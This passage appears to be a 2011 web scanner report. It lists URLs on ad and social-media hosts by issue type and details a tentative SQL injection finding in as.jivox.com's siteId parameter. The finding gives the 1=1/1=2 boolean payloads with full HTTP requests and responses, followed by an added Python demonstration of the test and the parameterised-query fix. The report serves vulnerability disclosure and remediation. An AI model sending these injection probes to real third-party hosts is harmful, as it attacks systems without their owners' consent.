22.27. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

22.28. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

22.29. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

22.30. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

22.31. http://static.ak.connect.facebook.com/js/api_lib/v0.4/XdCommReceiver.debug.js

22.32. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js

22.33. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.34. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.35. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.36. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_short.gif

22.37. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_short.gif

22.38. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/nXqcdeyQ5vr.js

22.39. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js

22.40. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js

22.41. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/XcVjTLuzQ2O.js

22.42. http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/NSCTCZ866vV.css

22.43. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/dYwII2uSVbM.css

22.44. http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css

22.45. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/-uzFkmw0aKD.js

22.46. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/ZwGc6Ghug0y.css

22.47. http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/4zEIrWluYBR.css

22.48. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/nIpljRV8xB5.js

22.49. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/hnAKuJ5eYKY.css

22.50. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js

22.51. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/t4syXsnV4WE.js

22.52. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

22.53. http://www.facebook.com/extern/login_status.php

22.54. http://www.facebook.com/extern/login_status.php

22.55. http://www.facebook.com/extern/login_status.php

22.56. http://www.facebook.com/extern/login_status.php

22.57. http://www.facebook.com/extern/login_status.php

22.58. http://www.facebook.com/extern/login_status.php

22.59. http://www.facebook.com/extern/login_status.php

22.60. http://www.facebook.com/extern/login_status.php

22.61. http://www.facebook.com/extern/login_status.php

22.62. http://www.facebook.com/extern/login_status.php

22.63. http://www.facebook.com/extern/login_status.php

22.64. http://www.facebook.com/extern/login_status.php

22.65. http://www.facebook.com/extern/login_status.php

22.66. http://www.facebook.com/extern/login_status.php

22.67. http://www.facebook.com/extern/login_status.php

22.68. http://www.facebook.com/extern/login_status.php

22.69. http://www.facebook.com/extern/login_status.php

22.70. http://www.facebook.com/extern/login_status.php

22.71. http://www.facebook.com/plugins/activity.php

22.72. http://www.facebook.com/plugins/comments.php

22.73. http://www.facebook.com/plugins/like.php

22.74. http://www.facebook.com/plugins/like.php

22.75. http://www.facebook.com/plugins/like.php

22.76. http://www.facebook.com/plugins/like.php

22.77. http://www.facebook.com/plugins/like.php

22.78. http://www.facebook.com/plugins/like.php

22.79. http://www.facebook.com/plugins/like.php

22.80. http://www.facebook.com/plugins/like.php

22.81. http://www.facebook.com/plugins/like.php

22.82. http://www.facebook.com/plugins/like.php

22.83. http://www.facebook.com/plugins/like.php

22.84. http://www.facebook.com/plugins/like.php

22.85. http://www.facebook.com/plugins/like.php

22.86. http://www.facebook.com/plugins/like.php

22.87. http://www.facebook.com/plugins/like.php

22.88. http://www.facebook.com/plugins/like.php

22.89. http://www.facebook.com/plugins/like.php

22.90. http://www.facebook.com/plugins/like.php

22.91. http://www.facebook.com/plugins/like.php

22.92. http://www.facebook.com/plugins/like.php

22.93. http://www.facebook.com/plugins/like.php

22.94. http://www.facebook.com/plugins/like.php

22.95. http://www.facebook.com/plugins/like.php

22.96. http://www.facebook.com/plugins/like.php

22.97. http://www.facebook.com/plugins/like.php

22.98. http://www.facebook.com/plugins/like.php

22.99. http://www.facebook.com/plugins/like.php

22.100. http://www.facebook.com/plugins/like.php

22.101. http://www.facebook.com/plugins/like.php

22.102. http://www.facebook.com/plugins/like.php

22.103. http://www.facebook.com/plugins/like.php

22.104. http://www.facebook.com/plugins/like.php

22.105. http://www.facebook.com/plugins/like.php

22.106. http://www.facebook.com/plugins/like.php

22.107. http://www.facebook.com/plugins/like.php

22.108. http://www.facebook.com/plugins/like.php

22.109. http://www.facebook.com/plugins/like.php

22.110. http://www.facebook.com/plugins/like.php

22.111. http://www.facebook.com/plugins/like.php

22.112. http://www.facebook.com/plugins/like.php

22.113. http://www.facebook.com/plugins/likebox.php

22.114. http://www.facebook.com/plugins/likebox.php

22.115. http://www.facebook.com/plugins/likebox.php

22.116. http://www.facebook.com/plugins/likebox.php

22.117. http://www.facebook.com/plugins/likebox.php

22.118. http://www.facebook.com/plugins/likebox.php

22.119. http://www.facebook.com/plugins/likebox.php

22.120. http://www.facebook.com/plugins/likebox.php

22.121. http://www.facebook.com/plugins/likebox.php

22.122. http://www.facebook.com/plugins/recommendations.php

22.123. http://www.facebook.com/plugins/send.php

22.124. http://www.facebook.com/plugins/send.php

22.125. http://www.facebook.com/widgets/like.php

22.126. http://www35.glam.com/gad/glamadapt_jsrv.act

22.127. http://www35.glam.com/gad/glamadapt_jsrv.act

22.128. http://www35.glam.com/gad/glamadapt_jsrv.act

22.129. http://www35.glam.com/gad/glamadapt_jsrv.act

22.130. http://www35.glam.com/gad/glamadapt_jsrv.act

22.131. http://www35.glam.com/gad/glamadapt_jsrv.act

22.132. http://www35.glam.com/gad/glamadapt_jsrv.act

22.133. http://www35.glam.com/gad/glamadapt_jsrv.act

22.134. http://www35.glam.com/gad/glamadapt_jsrv.act

23. Credit card numbers disclosed

23.1. http://img.mediaplex.com/content/0/17038/128465/Roxy_728x90_Female_Butt.js

23.2. http://www35.glam.com/gad/glamadapt_jsrv.act

24. Robots.txt file

24.1. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11

24.2. http://d.xp1.ru4.com/meta

24.3. http://l.addthiscdn.com/live/t00/250lo.gif

24.4. http://load.exelator.com/load/

24.5. http://m.xp1.ru4.com/meta

24.6. http://matrix.hbo.com/b/ss/hboprod/1/H.20.3/s76848129960708

24.7. http://s.media-imdb.com/twilight/

24.8. http://segment-pixel.invitemedia.com/unpixel

24.9. http://server.cpmstar.com/brilig.aspx

24.10. http://vt.imiclk.com/cgi/vtc.cgi

24.11. http://www.mavgear.com/adaptive.php

25. HTML does not specify charset

25.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5527925

25.2. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

25.3. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

25.4. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7

25.5. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

25.6. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

25.7. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2

25.8. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8

25.9. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7

25.10. http://ad.doubleclick.net/adi/amzn.us.audienceextension/

25.11. http://ad.doubleclick.net/adi/x1.dt/dt2

25.12. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt

25.13. http://ad.doubleclick.net/pfadx/fansided_cim/

25.14. http://ad.yieldmanager.com/iframe3

25.15. http://adserver.veruta.com/cookiematch.fcgi

25.16. http://amch.questionmarket.com/adscgen/st.php

25.17. http://bidnw.ru4.com/nf

25.18. http://bn.xp1.ru4.com/nf

25.19. http://bpx.a9.com/amzn/iframe.html

25.20. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.21. http://cdn-bpx.a9.com/amzn/iframe.html

25.22. http://cdn.apture.com/media/html/aptureLoadIframe.html

25.23. http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html

25.24. http://creativeby1.unicast.com/script/V3.00/deliver2.html

25.25. http://d13.zedo.com/OzoDB/cutils/R53_5_5/jsc/1190/zpu.html

25.26. http://d3.zedo.com/jsc/d3/ff2.html

25.27. http://d3l3lkinz3f56t.cloudfront.net/dclk1-0.9.html

25.28. http://data.nba.com/data/html/gdyn/gdyn_nba.html

25.29. http://ds.addthis.com/red/psi/sites/idolator.com/p.json

25.30. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest.php

25.31. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest/1307750400.php

25.32. http://fls.doubleclick.net/activityi

25.33. http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php

25.34. http://js.adsonar.com/js/pass.html

25.35. http://kotaku.com/static/items/kotaku.com/trackers.html

25.36. http://mediacdn.disqus.com/1307735099/build/system/def.html

25.37. http://mediacdn.disqus.com/1307735099/build/system/reply.html

25.38. http://ping.chartbeat.net/ping

25.39. http://pixel.invitemedia.com/data_sync

25.40. http://platform0.twitter.com/widgets/follow_button.html

25.41. http://ptimeinc.chartbeat.net/ping

25.42. http://showadsak.pubmatic.com/AdServer/AdServerServlet

25.43. http://static.ny.us.criteo.net/empty.html

25.44. http://stats.townnews.com/thesouthern.com/

25.45. http://subscription-assets.time.com/prod/assets/themes/magazines/SUBS/templates/velocity/site/td-300x100bluepartofie/continue-ofie.html

25.46. http://tags.bluekai.com/site/2312

25.47. http://thesouthern.com/app/port/bulkCommentCount.php

25.48. http://thesouthern.com/app/port/tabMostCommentedJs.php

25.49. http://w55c.net/ct/cms-2-frame.html

25.50. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/

25.51. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp

25.52. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

25.53. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

25.54. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

25.55. http://www.hbo.com/favicon.ico

25.56. http://www.imdb.com/images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html

25.57. http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html

25.58. http://www.imdb.com/images/a/ifb/google_afc_labs.html

25.59. http://www.imdb.com/images/a/ifb/pda_comm2.html

25.60. http://www.imdb.com/title/tt0944947/_ajax/footer

25.61. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml

25.62. http://www.mtv.com/global/music/modules/rssPartner/js/index.jhtml

25.63. http://www.mtv.com/sitewide/modules/footer/brandFooter/js/index.jhtml

25.64. http://www.mtv.com/sitewide/modules/footer/js/index.jhtml

25.65. http://www.mtv.com/sitewide/modules/header/mtv/js/index.jhtml

25.66. http://www.nba.com/mavericks/

25.67. http://www.nba.com/video/cvp/teamarticleplayer.html

25.68. http://www.oneregion.com/app/calendar/events/js/calWidget.php

25.69. http://www.paperg.com/jsfb/embed.php

25.70. http://www.ugo.com/takeover/takeover.html

25.71. http://www.ugo.com/xd_receiver.htm

26. Content type incorrectly stated

26.1. http://ad.doubleclick.net/pfadx/fansided_cim/

26.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**

26.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**

26.4. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307970673**

26.5. http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_30%20years.jpg

26.6. http://admeld.lucidmedia.com/clicksense/admeld/match

26.7. http://adserv.impactengine.com/www/e9/07/w2/1y/objembed.html/@@1307040897@@

26.8. http://adserver.veruta.com/cookiematch.fcgi

26.9. http://amch.questionmarket.com/adscgen/st.php

26.10. http://api.mixpanel.com/track/

26.11. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json

26.12. http://api.twitter.com/1/fansided/lists/fansided-nba/statuses.json

26.13. http://api.uproxx.com/ulink/template.js

26.14. http://ar.voicefive.com/b/rc.pli

26.15. http://as.jivox.com/player/jivox_ad_tags.php

26.16. http://as.jivox.com/unit/jivox_unit_tags.php

26.17. http://beacon.videoegg.com/btf

26.18. http://beacon.videoegg.com/initjs

26.19. http://beacon.videoegg.com/invpos

26.20. http://bes-clck.com/v

26.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.22. http://cdn.apture.com/media/searchfilter.khtml.v33513556.js

26.23. http://cdn.triggertag.gorillanation.com/js/4600_US.php

26.24. http://cdn2.sbnation.com/profile_images/435869/a7d63d06_small.jpg

26.25. http://cm.npc-lee.overture.com/partner/css/ads.css

26.26. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest.php

26.27. http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest/1307750400.php

26.28. http://event.adxpose.com/event.flow

26.29. http://expedia-www.baynote.net/baynote/tags3/common

26.30. http://hollywoodcrush.mtv.com/wp-content/themes/charlie_default/community/flux.inc

26.31. http://kotaku.com/

26.32. http://l.apture.com/v3/

26.33. http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg

26.34. http://mediacdn.disqus.com/1307735099/fonts/disqus-webfont.woff

26.35. http://moviesblog.mtv.com/wp-content/themes/charlie_default/community/flux.inc

26.36. http://my.yahoo.com/e/df

26.37. http://my.yahoo.com/e/js

26.38. http://pglb.buzzfed.com/63975/3848554c08824c2e6b4e5963f6d2d7e2

26.39. http://pglb.buzzfed.com/83240/6ff44b0268185d901ef2d93cd3d3a48f

26.40. http://platform.twitter.com/widgets.js

26.41. http://showadsak.pubmatic.com/AdServer/AdServerServlet

26.42. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

26.43. http://thesouthern.com/app/port/bulkCommentCount.php

26.44. http://thesouthern.com/app/port/tabMostCommentedJs.php

26.45. http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/

26.46. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/

26.47. http://www.buzzfeed.com/favicon.ico

26.48. http://www.expedia.com/daily/js/flash.vbs

26.49. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

26.50. http://www.facebook.com/extern/login_status.php

26.51. http://www.lijit.com/wijit

26.52. http://www.mavgear.com/favicon.ico

26.53. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml

26.54. http://www.mtv.com/global/music/modules/rssPartner/js/index.jhtml

26.55. http://www.mtv.com/shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg

26.56. http://www.mtv.com/sitewide/css/charlie/themes/blogs/mtvmoviesblog/bg-tile_1200.gif

26.57. http://www.mtv.com/sitewide/modules/footer/brandFooter/js/index.jhtml

26.58. http://www.mtv.com/sitewide/modules/footer/js/index.jhtml

26.59. http://www.mtv.com/sitewide/modules/header/mtv/js/index.jhtml

26.60. http://www.oneregion.com/app/calendar/events/js/calWidget.php

26.61. http://www.paperg.com/jsfb/embed.php

26.62. http://www.reddit.com/static/spreddit4.gif

26.63. http://www.stumbleupon.com/hostedbadge.php

26.64. http://www2.sesamestats.com/paneltracking.aspx

26.65. http://www24a.glam.com/appdir/resources/rendergadget.js

27. Content type is not specified

27.1. http://ad.yieldmanager.com/st

27.2. http://ads.bluelithium.com/st

27.3. http://www.expedia.com/static/default/default/images/close_button.gif

27.4. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif

27.5. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif

27.6. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif

27.7. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

27.8. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

27.9. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

27.10. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

27.11. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

27.12. http://www.meebo.com/cmd/tc



1. SQL injection
There are 8 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://as.jivox.com/player/iabplayer.php [siteId parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://as.jivox.com
Path:   /player/iabplayer.php

Issue detail

The siteId parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the siteId parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
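The 1=1 / 1=2 difference test described above, and the parameterised-query remediation from the issue background, as an added example. This is not code from the scanner report or from as.jivox.com: the table, its single row and the two lookup functions are constructed stand-ins for whatever the real siteId lookup does, while the two payloads are the ones the report submitted. The concatenated lookup returns a row for the 1=1 payload and nothing for 1=2, which is exactly the difference the scanner keys on; the parameterised lookup returns nothing for both, because the quote and the comment sequence are compared as data rather than parsed as SQL.

```python
"""
Added example, not code from the scanner report or from as.jivox.com.
Reproduces the 1=1 / 1=2 difference test against a constructed siteId
lookup, first with string concatenation and then with a parameterised
query, which is the remediation the report recommends. The table, its one
row and the lookup functions are assumptions made for illustration; the
payloads are the ones the report submitted in the siteId parameter.
"""
import sqlite3
import urllib.parse

# Payloads exactly as submitted in the siteId parameter (URL-encoded).
PAYLOAD_TRUE = "'%20and%201%3d1--%20"
PAYLOAD_FALSE = "'%20and%201%3d2--%20"
BASE_VALUE = "24bbcd13d37379"   # the legitimate siteId from the request


def make_db():
    """Constructed in-memory table standing in for the real siteId lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sites (site_id TEXT PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO sites VALUES (?, ?)", (BASE_VALUE, "thesouthern.com"))
    conn.commit()
    return conn


def lookup_concat(conn, site_id):
    """Vulnerable pattern: the request value is spliced into the SQL text, so
    the quote in the input closes the string literal and the rest becomes SQL."""
    sql = "SELECT name FROM sites WHERE site_id = '" + site_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(conn, site_id):
    """Remediated pattern: the query structure is fixed first and the value is
    bound to the placeholder afterwards, so it can only be compared as data."""
    sql = "SELECT name FROM sites WHERE site_id = ?"
    return [row[0] for row in conn.execute(sql, (site_id,))]


def differential(lookup):
    """Send the true and false payloads through `lookup` and compare results.
    A difference between the two is what the scanner reports as evidence."""
    conn = make_db()
    true_case = lookup(conn, BASE_VALUE + urllib.parse.unquote(PAYLOAD_TRUE))
    false_case = lookup(conn, BASE_VALUE + urllib.parse.unquote(PAYLOAD_FALSE))
    return {"true_case": true_case, "false_case": false_case,
            "differs": true_case != false_case}


if __name__ == "__main__":
    for name, fn in (("concatenated", lookup_concat), ("parameterised", lookup_param)):
        print(name, differential(fn))
```

When reviewing this particular instance by hand, note that the two responses shown below do differ in content and not merely in size: Response 1 (Content-Length 2102) carries autoPlay, maxAds, pauseBetweenAds and related player parameters in the generated script URL, while Response 2 (Content-Length 1956) does not. That is the kind of difference worth confirming with a further pair of payloads, rather than a byte count alone. The finding is still marked Tentative, and the example above does not establish that the real endpoint builds its query by concatenation.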

Request 1

GET /player/iabplayer.php?siteId=24bbcd13d37379'%20and%201%3d1--%20&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:07:41 GMT
Expires: Mon, 4 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 2102
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Jivox Ad Preview
...[SNIP]...
k1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%252F2%252F%252Ahttp%253A%252F%252Fwww.quatros.com%26mouseAction%3DmouseOver%26autoPlay%3Dtrue%26maxAds%3D3%26pauseBetweenAds%3D1000%26volume%3D0%26volumeInitAction%3DtoggleMute%26restartOnUnmute%3D1%26jivoxBranded%3Dfalse%26serverURL%3Dhttp%3A%2F%2Fas.jivox.com%26reportingURL%3Dhttp%253A%252F%252Fevs.jivox.com%26adThumbnail%3Dhttp%3A%2F%2Fjivoxuploads.s3.amazonaws.com%2F15976%2F11955-vid-1284509745-4c901031d728a-b.jpg%26adVideoURL%3D' type='text/javascript'%3E%3C/script%3E"));
   </script>
   <noscript>
    <a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com" target="_blank">
    <img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg" height="250" width="300" border="0" />
    </a>
   </noscript>
</body>
</html>

Request 2

GET /player/iabplayer.php?siteId=24bbcd13d37379'%20and%201%3d2--%20&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:07:42 GMT
Expires: Mon, 4 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 1956
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Jivox Ad Preview
...[SNIP]...
jk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%252F2%252F%252Ahttp%253A%252F%252Fwww.quatros.com%26mouseAction%3DmouseOver%26serverURL%3Dhttp%3A%2F%2Fas.jivox.com%26reportingURL%3Dhttp%253A%252F%252Fevs.jivox.com%26adThumbnail%3Dhttp%3A%2F%2Fjivoxuploads.s3.amazonaws.com%2F15976%2F11955-vid-1284509745-4c901031d728a-b.jpg%26adVideoURL%3D' type='text/javascript'%3E%3C/script%3E"));
   </script>
   <noscript>
    <a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com" target="_blank">
    <img src="http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg" height="250" width="300" border="0" />
    </a>
   </noscript>
</body>
</html>


1.2. http://l.yimg.com/j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://l.yimg.com
Path:   /j/assets/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css

